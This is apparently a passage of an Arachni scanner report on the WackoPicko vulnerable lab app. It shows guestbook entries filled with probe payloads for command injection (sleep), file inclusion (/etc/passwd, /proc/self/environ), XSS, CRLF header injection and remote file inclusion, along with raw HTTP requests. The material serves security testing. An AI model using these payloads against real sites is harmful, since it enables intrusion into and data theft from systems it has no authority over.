        <p> - by arachni_name </p>
                <p class="comment"> sleep(4000/1000);</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by file:///etc/passwd . </p>
                <p class="comment">/proc/self/environ .</p>
        <p> - by arachni_name </p>
                <p class="comment">file:///etc/passwd .</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by file:///etc/passwd </p>
                <p class="comment">1</p>
        <p> - by /etc/passwd </p>
                <p class="comment">file:///etc/passwd</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by /proc/self/environ </p>
                <p class="comment">file:///proc/self/environ .</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by /etc/passwd . </p>
                <p class="comment">1</p>
        <p> - by /proc/self/environ . </p>
                <p class="comment">/proc/self/environ</p>
        <p> - by arachni_name </p>
                <p class="comment">/etc/passwd .</p>
        <p> - by arachni_name </p>
                <p class="comment">php://input</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by ;sleep(4000/1000); </p>
                <p class="comment">';sleep(4000/1000);#</p>
        <p> - by arachni_name </p>
                <p class="comment">/etc/passwd</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by ` sleep 4` </p>
                <p class="comment">' | sleep 4 | '</p>
        <p> - by arachni_name </p>
                <p class="comment"> ; sleep 4 ; </p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by  &amp; sleep 4 &amp;  </p>
                <p class="comment">' & sleep 4 & '</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by  ; sleep 4 ;  </p>
                <p class="comment">' ; sleep 4 ; '</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by &quot;;import time;time.sleep(4000/1000);# </p>
                <p class="comment">1</p>
        <p> - by &quot; &amp;&amp; sleep 4 &amp;&amp; &quot; </p>
                <p class="comment">1</p>
        <p> - by &quot; &amp; sleep 4 &amp; &quot; </p>
                <p class="comment">" & sleep 4 & "</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by ' ; sleep 4 ; ' </p>
                <p class="comment">" && sleep 4 && "</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by &quot; | sleep 4 | &quot; </p>
                <p class="comment">" | sleep 4 | "</p>
        <p> - by arachni_name </p>
                <p class="comment">';import time;time.sleep(4000/1000);#</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by ' &amp; sleep 4 &amp; ' </p>
                <p class="comment">1</p>
        <p> - by  sleep(4000/1000); </p>
                <p class="comment">1</p>
        <p> - by arachni_name) </p>
                <p class="comment">1)</p>
        <p> - by arachni_name </p>
                <p class="comment">sleep 4</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by  | sleep 4 |  </p>
                <p class="comment">1</p>
        <p> - by sleep 4 </p>
                <p class="comment"> & sleep 4 & </p>
        <p> - by arachni_name </p>
                <p class="comment">1"'`--</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by  &amp;&amp; sleep 4 &amp;&amp;  </p>
                <p class="comment">1</p>
        <p> - by arachni_name&quot;'`-- </p>
                <p class="comment">1</p>
        <p> - by ' | sleep 4 | ' </p>
                <p class="comment">1</p>
        <p> - by ' &amp;&amp; sleep 4 &amp;&amp; ' </p>
                <p class="comment">' && sleep 4 && '</p>
        <p> - by arachni_name </p>
                <p class="comment"> && sleep 4 && </p>
        <p> - by arachni_name </p>
                <p class="comment"> | sleep 4 | </p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by arachni_name script:;arachni_xss_in_element_event=ca890a60d2e09a1de6dc78b0f4d0f8ec// </p>
                <p class="comment">1</p>
        <p> - by arachni_name &quot;;arachni_xss_in_element_event=ca890a60d2e09a1de6dc78b0f4d0f8ec// </p>
                <p class="comment">1</p>
        <p> - by arachni_name script:';arachni_xss_in_element_event=ca890a60d2e09a1de6dc78b0f4d0f8ec// </p>
                <p class="comment">1 script:';arachni_xss_in_element_event=ca890a60d2e09a1de6dc78b0f4d0f8ec//</p>
        <p> - by arachni_name </p>
                <p class="comment">1()"&%1'-;<xss_ca890a60d2e09a1de6dc78b0f4d0f8ec/>'</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by arachni_name script:&quot;;arachni_xss_in_element_event=ca890a60d2e09a1de6dc78b0f4d0f8ec// </p>
                <p class="comment">1%28%29%22%26%251%27-%3B%3Cxss_ca890a60d2e09a1de6dc78b0f4d0f8ec%2F%3E%27</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by arachni_name&lt;/textarea&gt;--&gt;&lt;xss_ca890a60d2e09a1de6dc78b0f4d0f8ec/&gt;&lt;!--&lt;textarea&gt; </p>
                <p class="comment">1</p>
        <p> - by arachni_name ';arachni_xss_in_element_event=ca890a60d2e09a1de6dc78b0f4d0f8ec// </p>
                <p class="comment">1 script:;arachni_xss_in_element_event=ca890a60d2e09a1de6dc78b0f4d0f8ec//</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by arachni_name&lt;xss_ca890a60d2e09a1de6dc78b0f4d0f8ec/&gt; </p>
                <p class="comment">1 ;arachni_xss_in_element_event=ca890a60d2e09a1de6dc78b0f4d0f8ec//</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by arachni_name%3C%2Ftextarea%3E--%3E%3Cxss_ca890a60d2e09a1de6dc78b0f4d0f8ec%2F%3E%3C%21--%3Ctextarea%3 </p>
                <p class="comment">1</p>
        <p> - by arachni_name%3Cxss_ca890a60d2e09a1de6dc78b0f4d0f8ec%2F%3E </p>
                <p class="comment">1</p>
        <p> - by arachni_name()&quot;&amp;%1'-;&lt;xss_ca890a60d2e09a1de6dc78b0f4d0f8ec/&gt;' </p>
                <p class="comment">1</p>
        <p> - by arachni_name%28%29%22%26%251%27-%3B%3Cxss_ca890a60d2e09a1de6dc78b0f4d0f8ec%2F%3E%27 </p>
                <p class="comment">1%3Cxss_ca890a60d2e09a1de6dc78b0f4d0f8ec%2F%3E</p>
        <p> - by arachni_name </p>
                <p class="comment">1<xss_ca890a60d2e09a1de6dc78b0f4d0f8ec/></p>
        <p> - by arachni_name </p>
                <p class="comment">1</textarea>--><xss_ca890a60d2e09a1de6dc78b0f4d0f8ec/><!--<textarea></p>
        <p> - by arachni_name </p>
                <p class="comment">1%3C%2Ftextarea%3E--%3E%3Cxss_ca890a60d2e09a1de6dc78b0f4d0f8ec%2F%3E%3C%21--%3Ctextarea%3E</p>
        <p> - by arachni_name </p>
                <p class="comment">1 script:";arachni_xss_in_element_event=ca890a60d2e09a1de6dc78b0f4d0f8ec//</p>
        <p> - by arachni_name </p>
                <p class="comment">1 ";arachni_xss_in_element_event=ca890a60d2e09a1de6dc78b0f4d0f8ec//</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by arachni_name ;arachni_xss_in_element_event=ca890a60d2e09a1de6dc78b0f4d0f8ec// </p>
                <p class="comment">https://www.ca890a60d2e09a1de6dc78b0f4d0f8ec.com/</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by www.ca890a60d2e09a1de6dc78b0f4d0f8ec.com/? </p>
                <p class="comment">www.ca890a60d2e09a1de6dc78b0f4d0f8ec.com/?</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by http://www.ca890a60d2e09a1de6dc78b0f4d0f8ec.com//? </p>
                <p class="comment">1</p>
        <p> - by https://www.ca890a60d2e09a1de6dc78b0f4d0f8ec.com/ </p>
                <p class="comment">http://www.ca890a60d2e09a1de6dc78b0f4d0f8ec.com//?</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by http://www.ca890a60d2e09a1de6dc78b0f4d0f8ec.com/ </p>
                <p class="comment">http://www.ca890a60d2e09a1de6dc78b0f4d0f8ec.com/</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by file:///proc/self/environ </p>
                <p class="comment">1</p>
        <p> - by https://www.ca890a60d2e09a1de6dc78b0f4d0f8ec.com//? </p>
                <p class="comment">1" arachni_xss_in_tag="ca890a60d2e09a1de6dc78b0f4d0f8ec" blah="</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by www.ca890a60d2e09a1de6dc78b0f4d0f8ec.com </p>
                <p class="comment">1' arachni_xss_in_tag='ca890a60d2e09a1de6dc78b0f4d0f8ec' blah='</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by arachni_name&quot; arachni_xss_in_tag=&quot;ca890a60d2e09a1de6dc78b0f4d0f8ec&quot; blah=&quot; </p>
                <p class="comment">www.ca890a60d2e09a1de6dc78b0f4d0f8ec.com</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by arachni_name arachni_xss_in_tag=ca890a60d2e09a1de6dc78b0f4d0f8ec blah= </p>
                <p class="comment">1</p>
        <p> - by arachni_name' arachni_xss_in_tag='ca890a60d2e09a1de6dc78b0f4d0f8ec' blah=' </p>
                <p class="comment">https://www.ca890a60d2e09a1de6dc78b0f4d0f8ec.com//?</p>
        <p> - by arachni_name </p>
                <p class="comment">1 arachni_xss_in_tag=ca890a60d2e09a1de6dc78b0f4d0f8ec blah=</p>
        <p> - by arachni_name </p>
                <p class="comment">1 ';arachni_xss_in_element_event=ca890a60d2e09a1de6dc78b0f4d0f8ec//</p>
        <p> - by arachni_name </p>
                <p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()'//</p>
        <p> - by arachni_name </p>
                <p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()"//</p>
        <p> - by arachni_name </p>
                <p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p>
        <p> - by arachni_name </p>
                <p class="comment">javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();'// </p>
                <p class="comment">1</p>
        <p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();' </p>
                <p class="comment">1</p>
        <p> - by javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
                <p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();'//</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()'// </p>
                <p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();'</p>
        <p> - by arachni_name </p>
                <p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by &quot;;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();&quot; </p>
                <p class="comment">1</p>
        <p> - by &quot;;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()&quot;// </p>
                <p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();"</p>
        <p> - by arachni_name </p>
                <p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()"</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by &quot;;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();&quot;// </p>
                <p class="comment">1</p>
        <p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p>
                <p class="comment">1</p>
        <p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
                <p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()'</p>
        <p> - by arachni_name </p>
                <p class="comment">javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by tests.arachni-scanner.com/rfi.md5.txt </p>
                <p class="comment">http://tests.arachni-scanner.com/rfi.md5.txt</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by arachni_nametests.arachni-scanner.com/rfi.md5.txt </p>
                <p class="comment">1tests.arachni-scanner.com/rfi.md5.txt </p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by arachni_namehttp://tests.arachni-scanner.com/rfi.md5.txt  </p>
                <p class="comment">1</p>
        <p> - by arachni_namehttp://tests.arachni-scanner.com/rfi.md5.txt </p>
                <p class="comment">1</p>
        <p> - by arachni_nametests.arachni-scanner.com/rfi.md5.txt  </p>
                <p class="comment">1</p>
        <p> - by tests.arachni-scanner.com/rfi.md5.txt  </p>
                <p class="comment">1tests.arachni-scanner.com/rfi.md5.txt</p>
        <p> - by arachni_name </p>
                <p class="comment">tests.arachni-scanner.com/rfi.md5.txt </p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p>
                <p class="comment">http://tests.arachni-scanner.com/rfi.md5.txt </p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()' </p>
                <p class="comment">1http://tests.arachni-scanner.com/rfi.md5.txt</p>
        <p> - by arachni_name </p>
                <p class="comment">1http://tests.arachni-scanner.com/rfi.md5.txt </p>
        <p> - by arachni_name </p>
                <p class="comment">tests.arachni-scanner.com/rfi.md5.txt</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by http://tests.arachni-scanner.com/rfi.md5.txt  </p>
                <p class="comment">1</p>
        <p> - by http://tests.arachni-scanner.com/rfi.md5.txt </p>
                <p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();"//</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by */;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()/* </p>
                <p class="comment">',x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:'</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by &lt;/script&gt;&lt;script&gt;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()&lt;/script&gt; </p>
                <p class="comment">1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by &quot;,x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:&quot; </p>
                <p class="comment">1</p>
        <p> - by ',x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:' </p>
                <p class="comment"></script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script>

                // Injected by Arachni::Browser::Javascript
                _arachni_js_namespaceTaintTracer.update_tracers();
                _arachni_js_namespaceDOMMonitor.update_trackers();

window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
</p>
        <p> - by arachni_name </p>
                <p class="comment">1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
                <p class="comment">",x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:"</p>
        <p> - by arachni_name </p>
                <p class="comment">1'"</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by arachni_name]]]]]]]]] </p>
                <p class="comment">1]]]]]]]]]</p>
        <p> - by arachni_name </p>
                <p class="comment">1<!--</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by arachni_name#^($!@$)(()))****** </p>
                <p class="comment">1</p>
        <p> - by arachni_name'&quot; </p>
                <p class="comment">1</p>
        <p> - by arachni_name&lt;!-- </p>
                <p class="comment">1#^($!@$)(()))******</p>
        <p> - by arachni_name </p>
                <p class="comment">window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by 1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();// </p>
                <p class="comment">1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();//</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(); </p>
                <p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p>
        <p> - by arachni_name </p>
                <p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
        <p> - by arachni_name </p>
                <p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();//</p>
        <p> - by arachni_name </p>
                <p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(); </p>
                <p class="comment">1</p>
        <p> - by &quot;;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()&quot; </p>
                <p class="comment">1</p>
        <p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
                <p class="comment">1</p>
        <p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();// </p>
                <p class="comment">1</p>
        <p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p>
                <p class="comment">1</p>
        <p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();// </p>
                <p class="comment">*/;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()/*</p>
        <p> - by arachni_name </p>
                <p class="comment">1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
        <p> - by arachni_name </p>
                <p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by 1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(); </p>
                <p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();//</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by 1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
                <p class="comment">1</p>
        <p> - by 1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p>
                <p class="comment">1</p>
        <p> - by arachni_name
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no  </p>
                <p class="comment">1</p>
        <p> - by 
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
                <p class="comment">_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by _arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
                <p class="comment">1</p>
        <p> - by arachni_name_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec  </p>
                <p class="comment">1
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by arachni_name_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
                <p class="comment">1</p>
        <p> - by 
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no  </p>
                <p class="comment">
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by arachni_name
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
                <p class="comment">1
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p>
        <p> - by arachni_name </p>
                <p class="comment">
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p>
        <p> - by arachni_name </p>
                <p class="comment">hTtP://tests.arachni-scanner.com/rfi.md5.txt</p>
        <p> - by arachni_name </p>
                <p class="comment">hTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by arachni_namehTtP://tests.arachni-scanner.com/rfi.md5.txt  </p>
                <p class="comment">1</p>
        <p> - by hTtP://tests.arachni-scanner.com/rfi.md5.txt  </p>
                <p class="comment">1</p>
        <p> - by _arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec  </p>
                <p class="comment">1</p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by arachni_namehTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
                <p class="comment">_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec</p>
        <p> - by arachni_name </p>
                <p class="comment">1hTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
        <p> - by arachni_name </p>
                <p class="comment">1</p>
        <p> - by hTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
                <p class="comment">1_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec</p>
        <p> - by arachni_name </p>
                <p class="comment">1hTtP://tests.arachni-scanner.com/rfi.md5.txt</p>
        <p> - by arachni_name </p>
                <p class="comment">1_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
        <p> - by arachni_name </p>
                <p class="comment">Hi, I love your site!</p>
        <p> - by adam </p>
        



<form action="/WackoPicko/guestbook.php" method="POST">
   Name: <br>
   <input type="text" name="name" /><br>
   Comment: <br>
   <textarea id="comment-box" name="comment"></textarea> <br>
   <input type="submit" value="Submit" />
</form>


</div>
       <div class="column span-24 first last" id="footer" >
        <ul>
          <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
          <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
          <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
        </ul>
      </div>
    </div>
  </body>
</html>  
   

HTTP request

Raw HTTP request used to retrieve the page.

POST /WackoPicko/guestbook.php HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Cookie: PHPSESSID=decslc8vmakk398sqkq9619t72
Content-Length: 76
Content-Type: application/x-www-form-urlencoded

comment=1&name=arachni_name_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec
HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:51:02 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1078
Content-Type: text/html


<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
	<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
	<div class="column prepend-1 span-14 first">
	  <ul class="menu">
	    <li class=""><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
	    <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
            <li class="current"><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
      
      	  </ul>
	</div>
	<div class="column prepend-1 span-7 first last">
	  <ul class="menu top_login" >
      	    <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
      	  </ul>
	</div>
      </div>
      
      
      
      <div class="column span-24 first last" id="search_bar_blue">
	<div class="column prepend-17 span-7 first last" id="search_box">
	  <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
	    <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
	    <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
	  </form>
	</div>
      </div>
   
<div class="column prepend-1 span-24 first last">
<h2>Guestbook</h2>
<h4>See what people are saying about us!</h4>

	<p class="comment">
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p>
	<p> - by arachni_name </p>
		<p class="comment">1
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by arachni_name
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
		<p class="comment">
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p>
	<p> - by arachni_name </p>
		<p class="comment">1</p>
	<p> - by 
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
		<p class="comment">1</p>
	<p> - by arachni_name_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
		<p class="comment">Hi, I love your site!</p>
	<p> - by adam </p>
	



<form action="/WackoPicko/guestbook.php" method="POST">
   Name: <br>
   <input type="text" name="name" /><br>
   Comment: <br>
   <textarea id="comment-box" name="comment"></textarea> <br>
   <input type="submit" value="Submit" />
</form>


</div>
       <div class="column span-24 first last" id="footer" >
	<ul>
	  <li><a href="/WackoPicko/">Home</a> |</li>
          <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
	  <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
	  <li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
	</ul>
      </div>
    </div>
  </body>
</html>  
   
Injected seed Proof
%28%29%22%26%251%27-%3B%3Cxss_ca890a60d2e09a1de6dc78b0f4d0f8ec%2F%3E%27
<xss_ca890a60d2e09a1de6dc78b0f4d0f8ec/>
Type In Action Default inputs Updated inputs
cookie http://192.168.0.26/WackoPicko/pictures/search.php?query=&x=38&y=12 http://192.168.0.26/WackoPicko/guestbook/
PHPSESSID
decslc8vmakk398sqkq9619t72
PHPSESSID
decslc8vmakk398sqkq9619t72%28%29%22%26%251%27-%3B%3Cxss_ca890a60d2e09a1de6dc78b0f4d0f8ec%2F%3E%27
HTTP request

Raw HTTP request used to retrieve the page.

GET /WackoPicko/guestbook/ HTTP/1.1
Host: 192.168.0.26
Accept-Encoding: gzip, deflate
User-Agent: Arachni/v1.5.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.8,he;q=0.6
X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Cookie: PHPSESSID=decslc8vmakk398sqkq9619t72%2528%2529%2522%2526%25251%2527-%253B%253Cxss_ca890a60d2e09a1de6dc78b0f4d0f8ec%252F%253E%2527

HTTP response

Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)

HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:51:04 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Set-Cookie: PHPSESSID=omn1osdrp0bnijli75pak99m82; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1801
Content-Type: text/html


<html>
  <head>
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
    <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> 
    <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
    <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
    <title>WackoPicko.com</title>
  </head>
  <body>
    <div class="container " style="border: 2px solid #5c95cf;">
      <div class="column span-24 first last">
	<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
      </div>
      <div id="menu">
	<div class="column prepend-1 span-14 first">
	  <ul class="menu">
	    <li class=""><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
